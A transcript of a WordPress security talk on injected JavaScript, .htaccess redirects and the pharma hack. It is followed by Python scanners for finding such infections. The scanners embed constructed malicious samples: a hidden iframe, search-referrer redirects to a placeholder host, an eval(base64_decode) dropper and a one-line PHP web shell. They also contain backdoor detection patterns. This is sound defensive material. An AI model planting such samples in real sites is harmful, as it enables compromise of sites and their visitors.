Why My Website Sells Viagra

Post on 29-Jan-2015

DESCRIPTION

WordPress End-User Security - WordCamp Atlanta - Dre Armeda, CISSP

TRANSCRIPT

2. DRE ARMEDA, CISSP - @dremeda
- Co-founder at Sucuri Security
- Organizer, WordCamp San Diego
- 12-year Navy veteran
- 1st WordPress theme in 2005
- Loves tacos
- Diehard Chargers fan
- Rides a Harley
sucuri.net | dre.im

4. THE WEB IS GROWING
- Over 2 billion internet users today; 480% growth in the last 11 years. (Internet World Stats)
- 300 million websites were added to the internet in 2011. (Pingdom)
- 100,000+ domains gained weekly. (Global Domain Registry)

5. INNOVATION & CREATIVITY

10. IT'S NOT ALL PEACHY

12. WHAT IS MALWARE?
Malware, short for malicious software, is software designed to disrupt computer operation, gather sensitive information, or gain unauthorized access to computer systems.
- SEO spam, JavaScript and iframe injections, and malicious redirects are a few examples of web-based malware.

14. ATTACKERS LOVE YOU
- Monitor your web browsing and internet usage
- Forced advertising
- Redirect affiliate marketing revenue

15. HOW BAD IS IT?
- Over 2 million new malware strains monthly. (McAfee)
- Cost to US consumers alone: over $2.3 billion in 2010. (Consumer Reports)
- Google Safe Browsing issues over 3 million malware warnings a day. (Google)

17. ENCODED JAVASCRIPT
JavaScript that is obfuscated (hidden) so that you can't tell what it does. It is injected into files and pages on the site and used to serve malware.
Impact: website pages may be used to serve malicious downloads to visitors. Those downloads may in turn infect desktop computers and/or steal FTP credentials.
Typical entry point: outdated, known-vulnerable software; compromised desktop computers; stolen FTP credentials.

18. ENCODED JAVASCRIPT - /wp-admin/js/cat.js, clean (screenshot)
19. ENCODED JAVASCRIPT - /wp-admin/js/cat.js, infected (screenshot)
20. ENCODED JAVASCRIPT - /wp-admin/js/cat.js, infection decoded, somewhat (screenshot)

21. ENCODED JAVASCRIPT - How it works:
- Attacker scans for known-vulnerable software (old WordPress installations, plugins, themes), or the attack stems from a compromised desktop from which FTP credentials are stolen.
- A backdoor file is inserted into the environment. This gives the attacker remote access into your world.
- The payload is inserted into various JavaScript files and/or encoded and hidden in theme and plugin files.
- You've just enabled your visitors to load fake anti-virus and other "cool" downloads from your site.

22. ENCODED JAVASCRIPT - Resources:
- http://www.schillmania.com/content/entries/2009/javascript-malware-obfuscation-analysis
- http://www.slideshare.net/yusufmotiwala/reverse-engineering-malicious-javascript
- http://www.infosecisland.com/videos-view/19101-Malware-Analysis-How-to-Decode-JavaScript-Obfuscation.html
QUICK TIP: Check Google to see if you're infected: site:{yourdomain.com} viagra

23. CONDITIONAL REDIRECTS
An attack that causes a website to redirect visitors to a malicious website based on referrer, web browser or operating system.
Impact: when traffic comes from a specific referrer (e.g. Google, Bing), the visitor is redirected to a malicious website.
Typical entry point: outdated, known-vulnerable software.

24. CONDITIONAL REDIRECTS - Infected .htaccess file (screenshot)
25. CONDITIONAL REDIRECTS - Result of the conditional redirect (screenshot)

26. CONDITIONAL REDIRECTS - How it works:
- Attacker scans for known-vulnerable software (old WordPress installations, plugins, themes).
- A backdoor file is inserted into the environment. This gives the attacker remote access into your world.
- .htaccess entries are created to perform the redirect. Encoded redirect code can also be added to index files.
- You're now redirecting to some "cool" malware awesomeness.

27. CONDITIONAL REDIRECTS - Resources:
- http://blog.sucuri.net/2011/11/the-new-and-old-htaccess-attacks-now-using-in-domains.html
- http://blog.sucuri.net/2010/04/conditional-redirects-or-the-htaccess-malware.html
- http://sucuri.net/malware-update-timthumb-php-and-htaccess-redirection.html

28. PHARMA HACK
The pharma hack is a type of SEO poisoning: attackers manipulate the victim site's search engine results so that their links rank above legitimate results.
Impact: website page and post titles, descriptions and links are changed to display pharmaceutical ads and links back to malicious websites in search engine result pages.
Typical entry point: outdated, known-vulnerable software.

29. PHARMA HACK - Results of scanning the rendered source (screenshot)
30. PHARMA HACK - Google search engine results (screenshot)

31. PHARMA HACK - How it works:
- Attacker scans for known-vulnerable software (old WordPress installations, plugins, themes).
- A backdoor file is inserted into the environment. This gives the attacker remote access into your world.
- A control file is inserted into core application or plugin files. This file acts as the connection from the backdoor to the database.
- The payload is dropped into the database and... Viva Viagra!
QUICK TIP: Check Google to see if you're infected: site:{yourdomain.com} viagra

32. PHARMA HACK - Resources:
- http://blog.sucuri.net/2010/07/understanding-and-cleaning-the-pharma-hack-on-wordpress.html
- http://blog.sucuri.net/2011/02/cleaning-up-an-infected-web-site-part-i-wordpress-and-the-pharma-hack.html
- http://www.pearsonified.com/2010/04/wordpress-pharma-hack.php
- http://wpdude.com/refreshing-google-index-after-pharma-hack

34. WHAT IS SECURITY?
Protecting things of value from harm's way.

35. HOW & WHY

36. AM I SECURE?
Risk can never be reduced to zero. The name of the game is minimizing risk.

38. LOCAL MACHINE
- Ensure your local machine stays updated.
- Use an anti-virus solution and enable auto-updates:
  - Mac: Sophos Anti-Virus for Mac Home Edition
  - Windows: AVG Anti-Virus Free
- Don't store server credentials on your local machine.

39. CONNECT TO YOUR SITE
- Consider using SFTP or SSH instead of FTP.
- If you're stuck with FTP:
  - Deny anonymous login.
  - Limit connections.
- Practice least privilege.
- Don't store server credentials on your local machine.

40. PASSWORDS
- Change them often.
- Don't write them down, or share them.
- Passwords are like toothbrushes: keep them to yourself, and discard them and get a new one if they have been used by others.
- Don't use the same password across all your accounts.
- Use a password manager:
  - KeePass Password Safe
  - LastPass
  - 1Password

41. WHO HOSTS YOU?
- CHEAP DOES NOT ALWAYS MEAN BEST, OR SAFEST!
- DO YOUR RESEARCH!
- What software are they running? How often do they update?
- How are server and support credentials stored, and who has access? Are they one and the same?
- What is their malware remediation process?
- How many of their sites have been infected?
- http://www.google.com/safebrowsing/diagnostic?site=google.com

42. GARAGE CLEANING
- IF YOU'RE NOT USING IT, REMOVE IT!
- UPDATE UPDATE UPDATE UPDATE UPDATE
- Only load what's needed to get your job done.
- Check your file and directory permissions.
- Remove unused user accounts. Practice least privilege.
- Have you changed your password lately?
- UPDATE UPDATE UPDATE UPDATE UPDATE

44. BACKUP YOUR WEBSITE
- NO BACKUPS = BOOOOO!
- BackupBuddy: http://pluginbuddy.com/backupbuddy/
- VaultPress: http://vaultpress.com

45. MALWARE SCAN - IS YOUR SITE INFECTED?
- Unmask Parasites: http://unmaskparasites.com
- Sucuri SiteCheck: http://sitecheck.sucuri.net

46. MALWARE CLEAN UP - IS YOUR SITE INFECTED?
- VaultPress: http://vaultpress.com
- Sucuri Security: http://sucuri.net

47. WORDPRESS PLUGINS
- WordPress Exploit Scanner
- BulletProof Security
- Login Lockdown
- Sucuri SiteCheck Malware Scanner
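The cat.js screenshots on slides 18 to 20 show a clean file, the infected file, and the injection decoded "somewhat". The Python script below is an added example and is not part of the deck: it performs that decoding statically, peeling `eval(String.fromCharCode(...))` and `eval(unescape("%..."))` layers one at a time without ever executing the attacker's code, then lists the indicators and URLs left in the innermost layer. The two-layer sample it decodes is constructed here to mirror the shape of such injections (a one-pixel iframe); example.com is a placeholder, not a real malware host.

```python
import json
import re
from urllib.parse import quote, unquote

# Encoded-literal shapes common in injected scripts. Only ASCII char codes and %XX escapes
# are handled; %uXXXX and string-arithmetic tricks are left for the analyst to inspect.
FROMCHARCODE = r"String\.fromCharCode\(\s*[\d\s,]*\d\s*\)"
UNESCAPE = r"unescape\(\s*(?:'[^'\\]*'|\"[^\"\\]*\")\s*\)"
ENCODED = re.compile(rf"(?:{FROMCHARCODE}|{UNESCAPE})")
EVAL_WRAP = re.compile(rf"eval\(\s*({FROMCHARCODE}|{UNESCAPE})\s*\)")
HEX_ESCAPE = re.compile(r"\\x([0-9A-Fa-f]{2})")
URL = re.compile(r"https?://[^\s'\"<>()]+")

INDICATORS = ("eval(", "unescape(", "String.fromCharCode", "document.write(",
              "<iframe", "window.location", "setTimeout(")


def decode_literal(expr: str) -> str:
    """Statically evaluate one String.fromCharCode(...) or unescape('...') call."""
    inner = expr[expr.index("(") + 1 : expr.rindex(")")].strip()
    if expr.startswith("String.fromCharCode"):
        return "".join(chr(int(c)) for c in inner.split(",") if c.strip())
    return unquote(inner[1:-1])  # drop the quotes, then percent-decode


def decode_layer(src: str) -> str:
    # eval(<encoded>) runs the decoded text as code, so the whole call becomes that text.
    unwrapped = EVAL_WRAP.sub(lambda m: decode_literal(m.group(1)), src)
    if unwrapped != src:
        return unwrapped  # one layer per pass, so a nested eval() is unwrapped next pass
    # Remaining encoded literals become readable quoted strings; \x3c escapes become chars.
    src = ENCODED.sub(lambda m: json.dumps(decode_literal(m.group(0))), src)
    return HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), src)


def decode(src: str, max_layers: int = 8) -> list[str]:
    """Peel layers until the text stops changing; returns every layer, outermost first."""
    layers = [src]
    for _ in range(max_layers):
        nxt = decode_layer(layers[-1])
        if nxt == layers[-1]:
            break
        layers.append(nxt)
    return layers


def indicators(code: str) -> list[str]:
    return [tok for tok in INDICATORS if tok in code]


def extract_urls(code: str) -> list[str]:
    return URL.findall(code)


# Constructed sample (not from a real infection): the iframe injection wrapped first in
# unescape(), then in String.fromCharCode(), each under its own eval().
PAYLOAD = "document.write('<iframe src=\"http://example.com/counter.php\" width=1 height=1></iframe>');"
LAYER1 = 'eval(unescape("%s"))' % quote(PAYLOAD, safe="")
SAMPLE = "eval(String.fromCharCode(%s))" % ",".join(str(ord(c)) for c in LAYER1)

if __name__ == "__main__":
    layers = decode(SAMPLE)
    for depth, layer in enumerate(layers):
        print(f"layer {depth}: {layer[:88]}{'...' if len(layer) > 88 else ''}")
    print("indicators:", indicators(layers[-1]))
    print("urls:", extract_urls(layers[-1]))
```

Run it against the suspicious file's contents instead of `SAMPLE` and read the last layer: the URL list is what to block and to search your other files for, and if the outer layer alone already trips `eval(` plus `String.fromCharCode`, that file deserves a look even before decoding.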
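Slides 24 to 26 describe the conditional redirect: `.htaccess` entries that bounce visitors to a malicious host only when the referrer is a search engine, with encoded redirect code sometimes added to index files as well. The following Python scanner is an added example, not code from the talk. It flags `RewriteRule` targets on a foreign host whose preceding `RewriteCond` lines key on `HTTP_REFERER` or `HTTP_USER_AGENT`, flags `ErrorDocument`/`Redirect` directives pointing off-site, and checks PHP for the same referrer-plus-`header('Location:')` combination. The site hostname, the stock WordPress rules, and the infected samples (example.net as the attacker host) are constructed here.

```python
import re
from urllib.parse import urlparse

# Request variables a cloaked redirect keys on: the site owner, typing the URL directly,
# never trips them, while search traffic is hijacked.
CONDITION_VARS = ("HTTP_REFERER", "HTTP_USER_AGENT")


def external_host(target: str, site_host: str):
    """Host of an absolute http(s) URL that is not our own site, else None."""
    u = urlparse(target)
    if u.scheme in ("http", "https") and u.hostname and u.hostname.lower() != site_host.lower():
        return u.hostname.lower()
    return None


def scan_htaccess(text: str, site_host: str) -> list[dict]:
    findings = []
    pending = []  # (line, variable) of RewriteCond lines awaiting their RewriteRule
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        tokens = line.split()
        directive = tokens[0]
        if directive == "RewriteCond" and len(tokens) >= 3:
            pending.append((lineno, tokens[1]))
        elif directive == "RewriteRule" and len(tokens) >= 3:
            keyed = [ln for ln, var in pending if any(v in var.upper() for v in CONDITION_VARS)]
            host = external_host(tokens[2], site_host)
            if keyed and host:
                findings.append({"line": lineno, "directive": directive, "host": host,
                                 "conditions": keyed,
                                 "reason": "off-site redirect conditioned on referrer/user-agent"})
            pending = []  # conditions apply only to the next RewriteRule
        elif directive in ("ErrorDocument", "Redirect", "RedirectMatch", "RedirectPermanent"):
            host = external_host(tokens[-1], site_host)
            if host:
                findings.append({"line": lineno, "directive": directive, "host": host,
                                 "conditions": [], "reason": "sends visitors off-site; verify it is intended"})
    return findings


PHP_COND = re.compile(r"\$_SERVER\s*\[\s*['\"](HTTP_REFERER|HTTP_USER_AGENT)['\"]\s*\]")
PHP_REDIR = re.compile(r"header\s*\(\s*['\"]\s*Location\s*:", re.I)


def scan_php(source: str) -> bool:
    """True when PHP both inspects referrer/user-agent and issues a Location header."""
    return bool(PHP_COND.search(source) and PHP_REDIR.search(source))


# Constructed samples. The clean file is the stock WordPress permalink block.
SITE = "myblog.example"
CLEAN_HTACCESS = """\
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
"""
# Infection appended below the stock block: search-engine referrals go to the attacker host.
INFECTED_HTACCESS = CLEAN_HTACCESS + """
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule ^(.*)$ http://example.net/in.cgi?8 [R=301,L]
ErrorDocument 404 http://example.net/404.php
"""
# The same trick dropped into index.php.
INFECTED_INDEX_PHP = ("<?php if(strpos($_SERVER['HTTP_REFERER'],'google')!==false)"
                      "{header('Location: http://example.net/go.php');exit;} ?>")

if __name__ == "__main__":
    print("clean   :", scan_htaccess(CLEAN_HTACCESS, SITE))
    for f in scan_htaccess(INFECTED_HTACCESS, SITE):
        print(f"infected: line {f['line']} {f['directive']} -> {f['host']} ({f['reason']})")
    print("index.php suspicious:", scan_php(INFECTED_INDEX_PHP))
```

Point `scan_htaccess` at every `.htaccess` in the site, not only the root one: attackers like subdirectories such as `wp-content/uploads` where nobody looks. A hit is also a reminder of the "how it works" list above: the redirect is the payload, so after removing it still hunt for the backdoor that wrote it.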
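Slides 28 to 30 show the pharma hack from two angles: the rendered source and the poisoned Google results. The spam is usually cloaked, served only when the request looks like a search-engine crawler, which is why the owner's browser shows a clean page while Google indexes pharmaceutical titles. The Python script below is an added example, not part of the talk: given the same page as fetched by a browser and as fetched by a crawler, it diffs title, meta description, outbound links and pharma keywords. The two HTML documents are constructed here; in practice you would fetch the URL twice, once with a browser User-Agent and once with `Googlebot/2.1 (+http://www.google.com/bot.html)` and a Google referrer, and feed both responses in.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Terms the pharma hack stuffs into titles, descriptions and hidden links.
PHARMA_TERMS = ("viagra", "cialis", "levitra", "pharmacy", "pills")


class PageSummary(HTMLParser):
    """Collect what search engines index: title, meta description, links and text."""

    def __init__(self):
        super().__init__()
        self.title = ""
        self.description = ""
        self.links = []  # (href, anchor text)
        self.text = []
        self._in_title = False
        self._link = None

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "title":
            self._in_title = True
        elif tag == "meta" and a.get("name", "").lower() == "description":
            self.description = a.get("content", "")
        elif tag == "a" and a.get("href"):
            self._link = [a["href"], ""]

    def handle_endtag(self, tag):
        if tag == "title":
            self._in_title = False
        elif tag == "a" and self._link:
            self.links.append(tuple(self._link))
            self._link = None

    def handle_data(self, data):
        if self._in_title:
            self.title += data
        if self._link:
            self._link[1] += data
        self.text.append(data)


def summarize(html: str) -> PageSummary:
    p = PageSummary()
    p.feed(html)
    p.close()
    return p


def _blob(s: PageSummary) -> str:
    return " ".join([s.title, s.description, *s.text, *(t for _, t in s.links)]).lower()


def compare_views(browser_html: str, crawler_html: str, site_host: str) -> dict:
    """Cloaked SEO spam shows up as whatever the crawler gets that the browser does not."""
    b, c = summarize(browser_html), summarize(crawler_html)
    browser_hrefs = {href for href, _ in b.links}
    injected = [(href, txt.strip()) for href, txt in c.links
                if href not in browser_hrefs
                and (urlparse(href).hostname or "").lower() != site_host.lower()]
    b_blob, c_blob = _blob(b), _blob(c)
    keywords = sorted(t for t in PHARMA_TERMS if t in c_blob and t not in b_blob)
    title_changed = b.title.strip() != c.title.strip()
    description_changed = b.description.strip() != c.description.strip()
    return {"title_changed": title_changed, "description_changed": description_changed,
            "injected_links": injected, "keywords": keywords,
            "cloaked": bool(title_changed or description_changed or injected or keywords)}


# Constructed pages, not captured from a real site. The browser view is the owner's normal post.
SITE = "myblog.example"
BROWSER_VIEW = """<html><head><title>My Blog - Weekend tacos</title>
<meta name="description" content="Notes on tacos, motorcycles and WordPress.">
</head><body><h1>Weekend tacos</h1><p>Found a great taco truck.</p>
<a href="http://myblog.example/about">About</a></body></html>"""
# The crawler view: rewritten title/description plus an off-screen block of pharma links.
CRAWLER_VIEW = """<html><head><title>Buy Viagra Online - Cheap Pills - My Blog</title>
<meta name="description" content="Cheap viagra and cialis online pharmacy, no prescription.">
</head><body><h1>Weekend tacos</h1><p>Found a great taco truck.</p>
<a href="http://myblog.example/about">About</a>
<div style="position:absolute;left:-9999px"><a href="http://example.org/buy-viagra">buy viagra</a>
<a href="http://example.org/cialis">cheap cialis</a></div></body></html>"""

if __name__ == "__main__":
    for k, v in compare_views(BROWSER_VIEW, CRAWLER_VIEW, SITE).items():
        print(f"{k}: {v}")
```

The `site:{yourdomain.com} viagra` quick tip is the zero-effort version of this check; the script is for the follow-up, when you need to prove which pages are cloaked and which hosts they link to before cleaning the database and requesting re-indexing.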
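All three "how it works" lists share the same second step, "a backdoor file is inserted into the environment", and the garage-cleaning slide says to check file and directory permissions. The Python script below is an added example, not code from the talk or from any of the plugins listed: it walks a WordPress tree and reports world-writable files and directories, PHP files sitting under `wp-content/uploads` (where only media belongs), and PHP source matching common backdoor shapes such as `eval(base64_decode(...))` or a request parameter called as a function. The sample tree it builds in a temporary directory is constructed here, including one deliberately world-writable `wp-config.php`; the patterns are indicators to review, not proof of compromise.

```python
import os
import re
import stat
import tempfile

# Source shapes typical of PHP backdoors: decode-and-run, or run whatever the request carries.
BACKDOOR_PATTERNS = [
    ("eval of decoded blob",
     re.compile(r"eval\s*\(\s*(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I)),
    ("request data called as a function",
     re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\s*\[[^\]]+\]\s*\(", re.I)),
    ("shell command from request data",
     re.compile(r"\b(system|passthru|shell_exec|exec|popen)\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)", re.I)),
    ("assert/preg_replace on request data",
     re.compile(r"\b(assert|create_function|preg_replace)\s*\([^;]*\$_(GET|POST|REQUEST|COOKIE)", re.I)),
]
PHP_EXT = (".php", ".phtml", ".php5")


def scan_tree(root: str) -> list[dict]:
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for d in dirnames:
            if os.stat(os.path.join(dirpath, d)).st_mode & stat.S_IWOTH:
                rel = os.path.relpath(os.path.join(dirpath, d), root).replace(os.sep, "/")
                findings.append({"path": rel, "issue": "world-writable directory"})
        for name in filenames:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            if os.stat(path).st_mode & stat.S_IWOTH:
                findings.append({"path": rel, "issue": "world-writable file"})
            if not name.lower().endswith(PHP_EXT):
                continue
            if rel.startswith("wp-content/uploads/"):
                findings.append({"path": rel, "issue": "PHP file in uploads directory"})
            with open(path, "r", errors="replace") as fh:
                src = fh.read()
            for label, pat in BACKDOOR_PATTERNS:
                if pat.search(src):
                    findings.append({"path": rel, "issue": f"backdoor pattern: {label}"})
                    break  # one pattern hit per file is enough to queue it for review
    return sorted(findings, key=lambda f: (f["path"], f["issue"]))


def build_sample_site() -> str:
    """Constructed WordPress-like tree: two clean files, a dropper, an uploaded shell, a bad mode."""
    root = tempfile.mkdtemp(prefix="wpscan_")
    files = {
        "index.php": "<?php define('WP_USE_THEMES', true); require './wp-blog-header.php';",
        "wp-config.php": "<?php define('DB_NAME', 'wordpress');",
        "wp-content/themes/mytheme/functions.php": "<?php function my_setup() { add_theme_support('menus'); }",
        # dropper hidden in a plugin directory: decodes and runs a base64 blob (here just echo 'hi';)
        "wp-content/plugins/some-plugin/.cache.php": "<?php eval(base64_decode('ZWNobyAnaGknOw=='));",
        # uploaded shell: PHP where only images should live, calling whatever name is POSTed
        "wp-content/uploads/2012/03/image.php": "<?php @$_POST['c']($_POST['p']);",
    }
    for rel, content in files.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(content)
        os.chmod(path, 0o644)  # explicit modes so the result does not depend on the umask
    for dirpath, dirnames, _ in os.walk(root):
        for d in dirnames:
            os.chmod(os.path.join(dirpath, d), 0o755)
    os.chmod(os.path.join(root, "wp-config.php"), 0o666)  # the one deliberate permission mistake
    return root


if __name__ == "__main__":
    for f in scan_tree(build_sample_site()):
        print(f"{f['path']}: {f['issue']}")
```

Run `scan_tree` against the real document root (on the server, or a fresh download of it) and compare the hit list with a known-good copy or the same release from wordpress.org: a file that exists only on the server, or differs from the release, is where the backdoor lives, and removing the visible payload without it means reinfection within days.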